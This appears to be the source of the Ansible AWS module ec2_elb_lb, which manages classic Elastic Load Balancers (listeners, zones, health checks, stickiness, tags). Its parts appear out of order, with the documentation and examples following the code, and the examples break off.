except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json_aws(e, 'Failed to connect to AWS')
_THROTTLING_RETRIES = 5
class ElbManager(object):
"""Handles ELB creation and destruction"""
def __init__(self, module, name, listeners=None, purge_listeners=None,
zones=None, purge_zones=None, security_group_ids=None,
health_check=None, subnets=None, purge_subnets=None,
scheme="internet-facing", connection_draining_timeout=None,
idle_timeout=None,
cross_az_load_balancing=None, access_logs=None,
stickiness=None, wait=None, wait_timeout=None, tags=None,
region=None,
instance_ids=None, purge_instance_ids=None, **aws_connect_params):
self.module = module
self.name = name
self.listeners = listeners
self.purge_listeners = purge_listeners
self.instance_ids = instance_ids
self.purge_instance_ids = purge_instance_ids
self.zones = zones
self.purge_zones = purge_zones
self.security_group_ids = security_group_ids
self.health_check = health_check
self.subnets = subnets
self.purge_subnets = purge_subnets
self.scheme = scheme
self.connection_draining_timeout = connection_draining_timeout
self.idle_timeout = idle_timeout
self.cross_az_load_balancing = cross_az_load_balancing
self.access_logs = access_logs
self.stickiness = stickiness
self.wait = wait
self.wait_timeout = wait_timeout
self.tags = tags
self.aws_connect_params = aws_connect_params
self.region = region
self.changed = False
self.status = 'gone'
self.elb_conn = self._get_elb_connection()
try:
self.elb = self._get_elb()
except boto.exception.BotoServerError as e:
module.fail_json_aws(e, msg='Unable to get all load balancers')
self.ec2_conn = self._get_ec2_connection()
@_throttleable_operation(_THROTTLING_RETRIES)
def ensure_ok(self):
"""Create the ELB"""
if not self.elb:
# Zones and listeners will be added at creation
self._create_elb()
else:
if self._get_scheme():
# the only way to change the scheme is by recreating the resource
self.ensure_gone()
self._create_elb()
else:
self._set_zones()
self._set_security_groups()
self._set_elb_listeners()
self._set_subnets()
self._set_health_check()
# boto has introduced support for some ELB attributes in
# different versions, so we check first before trying to
# set them to avoid errors
if self._check_attribute_support('connection_draining'):
self._set_connection_draining_timeout()
if self._check_attribute_support('connecting_settings'):
self._set_idle_timeout()
if self._check_attribute_support('cross_zone_load_balancing'):
self._set_cross_az_load_balancing()
if self._check_attribute_support('access_log'):
self._set_access_log()
# add sticky options
self.select_stickiness_policy()
# ensure backend server policies are correct
self._set_backend_policies()
# set/remove instance ids
self._set_instance_ids()
self._set_tags()
def ensure_gone(self):
"""Destroy the ELB"""
if self.elb:
self._delete_elb()
if self.wait:
elb_removed = self._wait_for_elb_removed()
# Unfortunately even though the ELB itself is removed quickly
# the interfaces take longer so reliant security groups cannot
# be deleted until the interface has registered as removed.
elb_interface_removed = self._wait_for_elb_interface_removed()
if not (elb_removed and elb_interface_removed):
self.module.fail_json(msg='Timed out waiting for removal of load balancer.')
def get_info(self):
try:
check_elb = self.elb_conn.get_all_load_balancers(self.name)[0]
except Exception:
check_elb = None
if not check_elb:
info = {
'name': self.name,
'status': self.status,
'region': self.region
}
else:
try:
lb_cookie_policy = check_elb.policies.lb_cookie_stickiness_policies[0].__dict__['policy_name']
except Exception:
lb_cookie_policy = None
try:
app_cookie_policy = check_elb.policies.app_cookie_stickiness_policies[0].__dict__['policy_name']
except Exception:
app_cookie_policy = None
info = {
'name': check_elb.name,
'dns_name': check_elb.dns_name,
'zones': check_elb.availability_zones,
'security_group_ids': check_elb.security_groups,
'status': self.status,
'subnets': self.subnets,
'scheme': check_elb.scheme,
'hosted_zone_name': check_elb.canonical_hosted_zone_name,
'hosted_zone_id': check_elb.canonical_hosted_zone_name_id,
'lb_cookie_policy': lb_cookie_policy,
'app_cookie_policy': app_cookie_policy,
'proxy_policy': self._get_proxy_protocol_policy(),
'backends': self._get_backend_policies(),
'instances': [instance.id for instance in check_elb.instances],
'out_of_service_count': 0,
'in_service_count': 0,
'unknown_instance_state_count': 0,
'region': self.region
}
# status of instances behind the ELB
if info['instances']:
info['instance_health'] = [dict(
instance_id=instance_state.instance_id,
reason_code=instance_state.reason_code,
state=instance_state.state
) for instance_state in self.elb_conn.describe_instance_health(self.name)]
else:
info['instance_health'] = []
# instance state counts: InService or OutOfService
if info['instance_health']:
for instance_state in info['instance_health']:
if instance_state['state'] == "InService":
info['in_service_count'] += 1
elif instance_state['state'] == "OutOfService":
info['out_of_service_count'] += 1
else:
info['unknown_instance_state_count'] += 1
if check_elb.health_check:
info['health_check'] = {
'target': check_elb.health_check.target,
'interval': check_elb.health_check.interval,
'timeout': check_elb.health_check.timeout,
'healthy_threshold': check_elb.health_check.healthy_threshold,
'unhealthy_threshold': check_elb.health_check.unhealthy_threshold,
}
if check_elb.listeners:
info['listeners'] = [self._api_listener_as_tuple(l)
for l in check_elb.listeners]
elif self.status == 'created':
# When creating a new ELB, listeners don't show in the
# immediately returned result, so just include the
# ones that were added
info['listeners'] = [self._listener_as_tuple(l)
for l in self.listeners]
else:
info['listeners'] = []
if self._check_attribute_support('connection_draining'):
info['connection_draining_timeout'] = int(self.elb_conn.get_lb_attribute(self.name, 'ConnectionDraining').timeout)
if self._check_attribute_support('connecting_settings'):
info['idle_timeout'] = self.elb_conn.get_lb_attribute(self.name, 'ConnectingSettings').idle_timeout
if self._check_attribute_support('cross_zone_load_balancing'):
is_cross_az_lb_enabled = self.elb_conn.get_lb_attribute(self.name, 'CrossZoneLoadBalancing')
if is_cross_az_lb_enabled:
info['cross_az_load_balancing'] = 'yes'
else:
info['cross_az_load_balancing'] = 'no'
# return stickiness info?
info['tags'] = self.tags
return info
@_throttleable_operation(_THROTTLING_RETRIES)
def _wait_for_elb_removed(self):
polling_increment_secs = 15
max_retries = (self.wait_timeout // polling_increment_secs)
status_achieved = False
for x in range(0, max_retries):
try:
self.elb_conn.get_all_lb_attributes(self.name)
except (boto.exception.BotoServerError, Exception) as e:
if "LoadBalancerNotFound" in e.code:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
return status_achieved
@_throttleable_operation(_THROTTLING_RETRIES)
def _wait_for_elb_interface_removed(self):
polling_increment_secs = 15
max_retries = (self.wait_timeout // polling_increment_secs)
status_achieved = False
elb_interfaces = self.ec2_conn.get_all_network_interfaces(
filters={'attachment.instance-owner-id': 'amazon-elb',
'description': 'ELB {0}'.format(self.name)})
for x in range(0, max_retries):
for interface in elb_interfaces:
try:
result = self.ec2_conn.get_all_network_interfaces(interface.id)
if result == []:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
except (boto.exception.BotoServerError, Exception) as e:
if 'InvalidNetworkInterfaceID' in e.code:
status_achieved = True
break
else:
self.module.fail_json_aws(e, 'Failure while waiting for interface to be removed')
return status_achieved
@_throttleable_operation(_THROTTLING_RETRIES)
def _get_elb(self):
elbs = self.elb_conn.get_all_load_balancers()
for elb in elbs:
if self.name == elb.name:
self.status = 'ok'
return elb
def _get_elb_connection(self):
try:
return connect_to_aws(boto.ec2.elb, self.region,
**self.aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
self.module.fail_json_aws(e, 'Failure while connecting to AWS')
def _get_ec2_connection(self):
try:
return connect_to_aws(boto.ec2, self.region,
**self.aws_connect_params)
except (boto.exception.NoAuthHandlerFound, Exception) as e:
self.module.fail_json_aws(e, 'Failure while connecting to AWS')
@_throttleable_operation(_THROTTLING_RETRIES)
def _delete_elb(self):
# True if succeeds, exception raised if not
result = self.elb_conn.delete_load_balancer(name=self.name)
if result:
self.changed = True
self.status = 'deleted'
def _create_elb(self):
listeners = [self._listener_as_tuple(l) for l in self.listeners]
self.elb = self.elb_conn.create_load_balancer(name=self.name,
zones=self.zones,
security_groups=self.security_group_ids,
complex_listeners=listeners,
subnets=self.subnets,
scheme=self.scheme)
if self.elb:
# HACK: Work around a boto bug in which the listeners attribute is
# always set to the listeners argument to create_load_balancer, and
# not the complex_listeners
# We're not doing a self.elb = self._get_elb here because there
# might be eventual consistency issues and it doesn't necessarily
# make sense to wait until the ELB gets returned from the EC2 API.
# This is necessary in the event we hit the throttling errors and
# need to retry ensure_ok
# See https://github.com/boto/boto/issues/3526
self.elb.listeners = self.listeners
self.changed = True
self.status = 'created'
def _create_elb_listeners(self, listeners):
"""Takes a list of listener tuples and creates them"""
# True if succeeds, exception raised if not
self.changed = self.elb_conn.create_load_balancer_listeners(self.name,
complex_listeners=listeners)
def _delete_elb_listeners(self, listeners):
"""Takes a list of listener tuples and deletes them from the elb"""
ports = [l[0] for l in listeners]
# True if succeeds, exception raised if not
self.changed = self.elb_conn.delete_load_balancer_listeners(self.name,
ports)
def _set_elb_listeners(self):
"""
Creates listeners specified by self.listeners; overwrites existing
listeners on these ports; removes extraneous listeners
"""
listeners_to_add = []
listeners_to_remove = []
listeners_to_keep = []
# Check for any listeners we need to create or overwrite
for listener in self.listeners:
listener_as_tuple = self._listener_as_tuple(listener)
# First we loop through existing listeners to see if one is
# already specified for this port
existing_listener_found = None
for existing_listener in self.elb.listeners:
# Since ELB allows only one listener on each incoming port, a
# single match on the incoming port is all we're looking for
if existing_listener[0] == int(listener['load_balancer_port']):
existing_listener_found = self._api_listener_as_tuple(existing_listener)
break
if existing_listener_found:
# Does it match exactly?
if listener_as_tuple != existing_listener_found:
# The ports are the same but something else is different,
# so we'll remove the existing one and add the new one
listeners_to_remove.append(existing_listener_found)
listeners_to_add.append(listener_as_tuple)
else:
# We already have this listener, so we're going to keep it
listeners_to_keep.append(existing_listener_found)
else:
# We didn't find an existing listener, so just add the new one
listeners_to_add.append(listener_as_tuple)
# Check for any extraneous listeners we need to remove, if desired
if self.purge_listeners:
for existing_listener in self.elb.listeners:
existing_listener_tuple = self._api_listener_as_tuple(existing_listener)
if existing_listener_tuple in listeners_to_remove:
# Already queued for removal
continue
if existing_listener_tuple in listeners_to_keep:
# Keep this one around
continue
# Since we're not already removing it and we don't need to keep
# it, let's get rid of it
listeners_to_remove.append(existing_listener_tuple)
if listeners_to_remove:
self._delete_elb_listeners(listeners_to_remove)
if listeners_to_add:
self._create_elb_listeners(listeners_to_add)
def _api_listener_as_tuple(self, listener):
"""Adds ssl_certificate_id to ELB API tuple if present"""
base_tuple = listener.get_complex_tuple()
if listener.ssl_certificate_id and len(base_tuple) < 5:
return base_tuple + (listener.ssl_certificate_id,)
return base_tuple
def _listener_as_tuple(self, listener):
"""Formats listener as a 4- or 5-tuples, in the order specified by the
ELB API"""
# N.B. string manipulations on protocols below (str(), upper()) is to
# ensure format matches output from ELB API
listener_list = [
int(listener['load_balancer_port']),
int(listener['instance_port']),
str(listener['protocol'].upper()),
]
# Instance protocol is not required by ELB API; it defaults to match
# load balancer protocol. We'll mimic that behavior here
if 'instance_protocol' in listener:
listener_list.append(str(listener['instance_protocol'].upper()))
else:
listener_list.append(str(listener['protocol'].upper()))
if 'ssl_certificate_id' in listener:
listener_list.append(str(listener['ssl_certificate_id']))
return tuple(listener_list)
def _enable_zones(self, zones):
try:
self.elb.enable_zones(zones)
except boto.exception.BotoServerError as e:
self.module.fail_json_aws(e, msg='unable to enable zones')
self.changed = True
def _disable_zones(self, zones):
try:
self.elb.disable_zones(zones)
except boto.exception.BotoServerError as e:
self.module.fail_json_aws(e, msg='unable to disable zones')
self.changed = True
def _attach_subnets(self, subnets):
self.elb_conn.attach_lb_to_subnets(self.name, subnets)
self.changed = True
def _detach_subnets(self, subnets):
self.elb_conn.detach_lb_from_subnets(self.name, subnets)
self.changed = True
def _set_subnets(self):
"""Determine which subnets need to be attached or detached on the ELB"""
if self.subnets:
if self.purge_subnets:
subnets_to_detach = list(set(self.elb.subnets) - set(self.subnets))
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
else:
subnets_to_detach = None
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
if subnets_to_attach:
self._attach_subnets(subnets_to_attach)
if subnets_to_detach:
self._detach_subnets(subnets_to_detach)
def _get_scheme(self):
"""Determine if the current scheme is different than the scheme of the ELB"""
if self.scheme:
if self.elb.scheme != self.scheme:
if not self.wait:
self.module.fail_json(msg="Unable to modify scheme without using the wait option")
return True
return False
def _set_zones(self):
"""Determine which zones need to be enabled or disabled on the ELB"""
if self.zones:
if self.purge_zones:
zones_to_disable = list(set(self.elb.availability_zones) -
set(self.zones))
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
else:
zones_to_disable = None
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
if zones_to_enable:
self._enable_zones(zones_to_enable)
# N.B. This must come second, in case it would have removed all zones
if zones_to_disable:
self._disable_zones(zones_to_disable)
def _set_security_groups(self):
if self.security_group_ids is not None and set(self.elb.security_groups) != set(self.security_group_ids):
self.elb_conn.apply_security_groups_to_lb(self.name, self.security_group_ids)
self.changed = True
def _set_health_check(self):
"""Set health check values on ELB as needed"""
if self.health_check:
# This just makes it easier to compare each of the attributes
# and look for changes. Keys are attributes of the current
# health_check; values are desired values of new health_check
health_check_config = {
"target": self._get_health_check_target(),
"timeout": self.health_check['response_timeout'],
"interval": self.health_check['interval'],
"unhealthy_threshold": self.health_check['unhealthy_threshold'],
"healthy_threshold": self.health_check['healthy_threshold'],
}
update_health_check = False
# The health_check attribute is *not* set on newly created
# ELBs! So we have to create our own.
if not self.elb.health_check:
self.elb.health_check = HealthCheck()
for attr, desired_value in health_check_config.items():
if getattr(self.elb.health_check, attr) != desired_value:
setattr(self.elb.health_check, attr, desired_value)
update_health_check = True
if update_health_check:
self.elb.configure_health_check(self.elb.health_check)
self.changed = True
def _check_attribute_support(self, attr):
return hasattr(boto.ec2.elb.attributes.LbAttributes(), attr)
def _set_cross_az_load_balancing(self):
attributes = self.elb.get_attributes()
if self.cross_az_load_balancing:
if not attributes.cross_zone_load_balancing.enabled:
self.changed = True
attributes.cross_zone_load_balancing.enabled = True
else:
if attributes.cross_zone_load_balancing.enabled:
self.changed = True
attributes.cross_zone_load_balancing.enabled = False
self.elb_conn.modify_lb_attribute(self.name, 'CrossZoneLoadBalancing',
attributes.cross_zone_load_balancing.enabled)
def _set_access_log(self):
attributes = self.elb.get_attributes()
if self.access_logs:
if 's3_location' not in self.access_logs:
self.module.fail_json(msg='s3_location information required')
access_logs_config = {
"enabled": True,
"s3_bucket_name": self.access_logs['s3_location'],
"s3_bucket_prefix": self.access_logs.get('s3_prefix', ''),
"emit_interval": self.access_logs.get('interval', 60),
}
update_access_logs_config = False
for attr, desired_value in access_logs_config.items():
if getattr(attributes.access_log, attr) != desired_value:
setattr(attributes.access_log, attr, desired_value)
update_access_logs_config = True
if update_access_logs_config:
self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
self.changed = True
elif attributes.access_log.enabled:
attributes.access_log.enabled = False
self.changed = True
self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
def _set_connection_draining_timeout(self):
attributes = self.elb.get_attributes()
if self.connection_draining_timeout is not None:
if not attributes.connection_draining.enabled or \
attributes.connection_draining.timeout != self.connection_draining_timeout:
self.changed = True
attributes.connection_draining.enabled = True
attributes.connection_draining.timeout = self.connection_draining_timeout
self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
else:
if attributes.connection_draining.enabled:
self.changed = True
attributes.connection_draining.enabled = False
self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
def _set_idle_timeout(self):
attributes = self.elb.get_attributes()
if self.idle_timeout is not None:
if attributes.connecting_settings.idle_timeout != self.idle_timeout:
self.changed = True
attributes.connecting_settings.idle_timeout = self.idle_timeout
self.elb_conn.modify_lb_attribute(self.name, 'ConnectingSettings', attributes.connecting_settings)
def _policy_name(self, policy_type):
return 'ec2-elb-lb-{0}'.format(to_native(policy_type, errors='surrogate_or_strict'))
def _create_policy(self, policy_param, policy_meth, policy):
getattr(self.elb_conn, policy_meth)(policy_param, self.elb.name, policy)
def _delete_policy(self, elb_name, policy):
self.elb_conn.delete_lb_policy(elb_name, policy)
def _update_policy(self, policy_param, policy_meth, policy_attr, policy):
self._delete_policy(self.elb.name, policy)
self._create_policy(policy_param, policy_meth, policy)
def _set_listener_policy(self, listeners_dict, policy=None):
policy = [] if policy is None else policy
for listener_port in listeners_dict:
if listeners_dict[listener_port].startswith('HTTP'):
self.elb_conn.set_lb_policies_of_listener(self.elb.name, listener_port, policy)
def _set_stickiness_policy(self, elb_info, listeners_dict, policy, **policy_attrs):
for p in getattr(elb_info.policies, policy_attrs['attr']):
if str(p.__dict__['policy_name']) == str(policy[0]):
if str(p.__dict__[policy_attrs['dict_key']]) != str(policy_attrs['param_value'] or 0):
self._set_listener_policy(listeners_dict)
self._update_policy(policy_attrs['param_value'], policy_attrs['method'], policy_attrs['attr'], policy[0])
self.changed = True
break
else:
self._create_policy(policy_attrs['param_value'], policy_attrs['method'], policy[0])
self.changed = True
self._set_listener_policy(listeners_dict, policy)
def select_stickiness_policy(self):
if self.stickiness:
if 'cookie' in self.stickiness and 'expiration' in self.stickiness:
self.module.fail_json(msg='\'cookie\' and \'expiration\' can not be set at the same time')
elb_info = self.elb_conn.get_all_load_balancers(self.elb.name)[0]
d = {}
for listener in elb_info.listeners:
d[listener[0]] = listener[2]
listeners_dict = d
if self.stickiness['type'] == 'loadbalancer':
policy = []
policy_type = 'LBCookieStickinessPolicyType'
if self.module.boolean(self.stickiness['enabled']):
if 'expiration' not in self.stickiness:
self.module.fail_json(msg='expiration must be set when type is loadbalancer')
try:
expiration = self.stickiness['expiration'] if int(self.stickiness['expiration']) else None
except ValueError:
self.module.fail_json(msg='expiration must be set to an integer')
policy_attrs = {
'type': policy_type,
'attr': 'lb_cookie_stickiness_policies',
'method': 'create_lb_cookie_stickiness_policy',
'dict_key': 'cookie_expiration_period',
'param_value': expiration
}
policy.append(self._policy_name(policy_attrs['type']))
self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
elif not self.module.boolean(self.stickiness['enabled']):
if len(elb_info.policies.lb_cookie_stickiness_policies):
if elb_info.policies.lb_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
self.changed = True
else:
self.changed = False
self._set_listener_policy(listeners_dict)
self._delete_policy(self.elb.name, self._policy_name(policy_type))
elif self.stickiness['type'] == 'application':
policy = []
policy_type = 'AppCookieStickinessPolicyType'
if self.module.boolean(self.stickiness['enabled']):
if 'cookie' not in self.stickiness:
self.module.fail_json(msg='cookie must be set when type is application')
policy_attrs = {
'type': policy_type,
'attr': 'app_cookie_stickiness_policies',
'method': 'create_app_cookie_stickiness_policy',
'dict_key': 'cookie_name',
'param_value': self.stickiness['cookie']
}
policy.append(self._policy_name(policy_attrs['type']))
self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
elif not self.module.boolean(self.stickiness['enabled']):
if len(elb_info.policies.app_cookie_stickiness_policies):
if elb_info.policies.app_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
self.changed = True
self._set_listener_policy(listeners_dict)
self._delete_policy(self.elb.name, self._policy_name(policy_type))
else:
self._set_listener_policy(listeners_dict)
def _get_backend_policies(self):
"""Get a list of backend policies"""
policies = []
if self.elb.backends is not None:
for backend in self.elb.backends:
if backend.policies is not None:
for policy in backend.policies:
policies.append(str(backend.instance_port) + ':' + policy.policy_name)
return policies
def _set_backend_policies(self):
"""Sets policies for all backends"""
ensure_proxy_protocol = False
replace = []
backend_policies = self._get_backend_policies()
# Find out what needs to be changed
for listener in self.listeners:
want = False
if 'proxy_protocol' in listener and listener['proxy_protocol']:
ensure_proxy_protocol = True
want = True
if str(listener['instance_port']) + ':ProxyProtocol-policy' in backend_policies:
if not want:
replace.append({'port': listener['instance_port'], 'policies': []})
elif want:
replace.append({'port': listener['instance_port'], 'policies': ['ProxyProtocol-policy']})
# enable or disable proxy protocol
if ensure_proxy_protocol:
self._set_proxy_protocol_policy()
# Make the backend policies so
for item in replace:
self.elb_conn.set_lb_policies_of_backend_server(self.elb.name, item['port'], item['policies'])
self.changed = True
def _get_proxy_protocol_policy(self):
"""Find out if the elb has a proxy protocol enabled"""
if self.elb.policies is not None and self.elb.policies.other_policies is not None:
for policy in self.elb.policies.other_policies:
if policy.policy_name == 'ProxyProtocol-policy':
return policy.policy_name
return None
def _set_proxy_protocol_policy(self):
"""Install a proxy protocol policy if needed"""
proxy_policy = self._get_proxy_protocol_policy()
if proxy_policy is None:
self.elb_conn.create_lb_policy(
self.elb.name, 'ProxyProtocol-policy', 'ProxyProtocolPolicyType', {'ProxyProtocol': True}
)
self.changed = True
# TODO: remove proxy protocol policy if not needed anymore? There is no side effect to leaving it there
def _diff_list(self, a, b):
"""Find the entries in list a that are not in list b"""
b = set(b)
return [aa for aa in a if aa not in b]
def _get_instance_ids(self):
"""Get the current list of instance ids installed in the elb"""
instances = []
if self.elb.instances is not None:
for instance in self.elb.instances:
instances.append(instance.id)
return instances
def _set_instance_ids(self):
"""Register or deregister instances from an lb instance"""
assert_instances = self.instance_ids or []
has_instances = self._get_instance_ids()
add_instances = self._diff_list(assert_instances, has_instances)
if add_instances:
self.elb_conn.register_instances(self.elb.name, add_instances)
self.changed = True
if self.purge_instance_ids:
remove_instances = self._diff_list(has_instances, assert_instances)
if remove_instances:
self.elb_conn.deregister_instances(self.elb.name, remove_instances)
self.changed = True
def _set_tags(self):
"""Add/Delete tags"""
if self.tags is None:
return
params = {'LoadBalancerNames.member.1': self.name}
tagdict = dict()
# get the current list of tags from the ELB, if ELB exists
if self.elb:
current_tags = self.elb_conn.get_list('DescribeTags', params,
[('member', Tag)])
tagdict = dict((tag.Key, tag.Value) for tag in current_tags
if hasattr(tag, 'Key'))
# Add missing tags
dictact = dict(set(self.tags.items()) - set(tagdict.items()))
if dictact:
for i, key in enumerate(dictact):
params['Tags.member.%d.Key' % (i + 1)] = key
params['Tags.member.%d.Value' % (i + 1)] = dictact[key]
self.elb_conn.make_request('AddTags', params)
self.changed = True
# Remove extra tags
dictact = dict(set(tagdict.items()) - set(self.tags.items()))
if dictact:
for i, key in enumerate(dictact):
params['Tags.member.%d.Key' % (i + 1)] = key
self.elb_conn.make_request('RemoveTags', params)
self.changed = True
def _get_health_check_target(self):
"""Compose target string from healthcheck parameters"""
protocol = self.health_check['ping_protocol'].upper()
path = ""
if protocol in ['HTTP', 'HTTPS'] and 'ping_path' in self.health_check:
path = self.health_check['ping_path']
return "%s:%s%s" % (protocol, self.health_check['ping_port'], path)
def main():
argument_spec = dict(
state={'required': True, 'choices': ['present', 'absent']},
name={'required': True},
listeners={'default': None, 'required': False, 'type': 'list', 'elements': 'dict'},
purge_listeners={'default': True, 'required': False, 'type': 'bool'},
instance_ids={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
purge_instance_ids={'default': False, 'required': False, 'type': 'bool'},
zones={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
purge_zones={'default': False, 'required': False, 'type': 'bool'},
security_group_ids={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
security_group_names={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
health_check={'default': None, 'required': False, 'type': 'dict'},
subnets={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
purge_subnets={'default': False, 'required': False, 'type': 'bool'},
scheme={'default': 'internet-facing', 'required': False, 'choices': ['internal', 'internet-facing']},
connection_draining_timeout={'default': None, 'required': False, 'type': 'int'},
idle_timeout={'default': None, 'type': 'int', 'required': False},
cross_az_load_balancing={'default': None, 'type': 'bool', 'required': False},
stickiness={'default': None, 'required': False, 'type': 'dict'},
access_logs={'default': None, 'required': False, 'type': 'dict'},
wait={'default': False, 'type': 'bool', 'required': False},
wait_timeout={'default': 60, 'type': 'int', 'required': False},
tags={'default': None, 'required': False, 'type': 'dict'}
)
module = AnsibleAWSModule(
argument_spec=argument_spec,
check_boto3=False,
mutually_exclusive=[['security_group_ids', 'security_group_names']]
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg="Region must be specified as a parameter, in EC2_REGION or AWS_REGION environment variables or in boto configuration file")
name = module.params['name']
state = module.params['state']
listeners = module.params['listeners']
purge_listeners = module.params['purge_listeners']
instance_ids = module.params['instance_ids']
purge_instance_ids = module.params['purge_instance_ids']
zones = module.params['zones']
purge_zones = module.params['purge_zones']
security_group_ids = module.params['security_group_ids']
security_group_names = module.params['security_group_names']
health_check = module.params['health_check']
access_logs = module.params['access_logs']
subnets = module.params['subnets']
purge_subnets = module.params['purge_subnets']
scheme = module.params['scheme']
connection_draining_timeout = module.params['connection_draining_timeout']
idle_timeout = module.params['idle_timeout']
cross_az_load_balancing = module.params['cross_az_load_balancing']
stickiness = module.params['stickiness']
wait = module.params['wait']
wait_timeout = module.params['wait_timeout']
tags = module.params['tags']
if state == 'present' and not listeners:
module.fail_json(msg="At least one listener is required for ELB creation")
if state == 'present' and not (zones or subnets):
module.fail_json(msg="At least one availability zone or subnet is required for ELB creation")
if wait_timeout > 600:
module.fail_json(msg='wait_timeout maximum is 600 seconds')
if security_group_names:
security_group_ids = []
try:
ec2 = connect_to_aws(boto.ec2, region, **aws_connect_params)
if subnets: # We have at least one subnet, ergo this is a VPC
vpc_conn = _get_vpc_connection(module=module, region=region, aws_connect_params=aws_connect_params)
vpc_id = vpc_conn.get_all_subnets([subnets[0]])[0].vpc_id
filters = {'vpc_id': vpc_id}
else:
filters = None
grp_details = ec2.get_all_security_groups(filters=filters)
for group_name in security_group_names:
if isinstance(group_name, string_types):
group_name = [group_name]
group_id = [str(grp.id) for grp in grp_details if str(grp.name) in group_name]
security_group_ids.extend(group_id)
except boto.exception.NoAuthHandlerFound as e:
module.fail_json_aws(e)
elb_man = ElbManager(module, name, listeners, purge_listeners, zones,
purge_zones, security_group_ids, health_check,
subnets, purge_subnets, scheme,
connection_draining_timeout, idle_timeout,
cross_az_load_balancing,
access_logs, stickiness, wait, wait_timeout, tags,
region=region, instance_ids=instance_ids, purge_instance_ids=purge_instance_ids,
**aws_connect_params)
# check for unsupported attributes for this version of boto
if cross_az_load_balancing and not elb_man._check_attribute_support('cross_zone_load_balancing'):
module.fail_json(msg="You must install boto >= 2.18.0 to use the cross_az_load_balancing attribute")
if connection_draining_timeout and not elb_man._check_attribute_support('connection_draining'):
module.fail_json(msg="You must install boto >= 2.28.0 to use the connection_draining_timeout attribute")
if idle_timeout and not elb_man._check_attribute_support('connecting_settings'):
module.fail_json(msg="You must install boto >= 2.33.0 to use the idle_timeout attribute")
if state == 'present':
elb_man.ensure_ok()
elif state == 'absent':
elb_man.ensure_gone()
ansible_facts = {'ec2_elb': 'info'}
ec2_facts_result = dict(changed=elb_man.changed,
elb=elb_man.get_info(),
ansible_facts=ansible_facts)
module.exit_json(**ec2_facts_result)
if __name__ == '__main__':
main()
| 39.65994 | 152 | 0.616678 |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: ec2_elb_lb
version_added: 1.0.0
description:
- Returns information about the load balancer.
- Will be marked changed when called only if state is changed.
short_description: Creates, updates or destroys an Amazon ELB.
author:
- "Jim Dalton (@jsdalton)"
options:
state:
description:
- Create or destroy the ELB.
type: str
choices: [ absent, present ]
required: true
name:
description:
- The name of the ELB.
type: str
required: true
listeners:
description:
- List of ports/protocols for this ELB to listen on (see examples).
type: list
elements: dict
purge_listeners:
description:
- Purge existing listeners on ELB that are not found in listeners.
type: bool
default: yes
instance_ids:
description:
- List of instance ids to attach to this ELB.
type: list
elements: str
purge_instance_ids:
description:
- Purge existing instance ids on ELB that are not found in instance_ids.
type: bool
default: no
zones:
description:
- List of availability zones to enable on this ELB.
type: list
elements: str
purge_zones:
description:
- Purge existing availability zones on ELB that are not found in zones.
type: bool
default: no
security_group_ids:
description:
- A list of security groups to apply to the ELB.
type: list
elements: str
security_group_names:
description:
- A list of security group names to apply to the ELB.
type: list
elements: str
health_check:
description:
- An associative array of health check configuration settings (see examples).
type: dict
access_logs:
description:
- An associative array of access logs configuration settings (see examples).
type: dict
subnets:
description:
- A list of VPC subnets to use when creating ELB. Zones should be empty if using this.
type: list
elements: str
purge_subnets:
description:
- Purge existing subnet on ELB that are not found in subnets.
type: bool
default: no
scheme:
description:
- The scheme to use when creating the ELB. For a private VPC-visible ELB use C(internal).
- If you choose to update your scheme with a different value the ELB will be destroyed and
recreated. To update scheme you must use the option I(wait).
type: str
choices: ["internal", "internet-facing"]
default: 'internet-facing'
connection_draining_timeout:
description:
- Wait a specified timeout allowing connections to drain before terminating an instance.
type: int
idle_timeout:
description:
- ELB connections from clients and to servers are timed out after this amount of time.
type: int
cross_az_load_balancing:
description:
- Distribute load across all configured Availability Zones.
- Defaults to C(false).
type: bool
stickiness:
description:
- An associative array of stickiness policy settings. Policy will be applied to all listeners (see examples).
type: dict
wait:
description:
- When specified, Ansible will check the status of the load balancer to ensure it has been successfully
removed from AWS.
type: bool
default: no
wait_timeout:
description:
- Used in conjunction with wait. Number of seconds to wait for the ELB to be terminated.
- A maximum of 600 seconds (10 minutes) is allowed.
type: int
default: 60
tags:
description:
- An associative array of tags. To delete all tags, supply an empty dict (C({})).
type: dict
extends_documentation_fragment:
- amazon.aws.aws
- amazon.aws.ec2
requirements:
- python >= 2.6
- boto
'''
EXAMPLES = """
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic provisioning example (non-VPC)
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
proxy_protocol: True
- protocol: https
load_balancer_port: 443
instance_protocol: http # optional, defaults to value of protocol setting
instance_port: 80
# ssl certificate required for https or ssl
ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/company/servercerts/ProdServerCert"
# Internal ELB example
- amazon.aws.ec2_elb_lb:
name: "test-vpc"
scheme: internal
state: present
instance_ids:
- i-abcd1234
purge_instance_ids: true
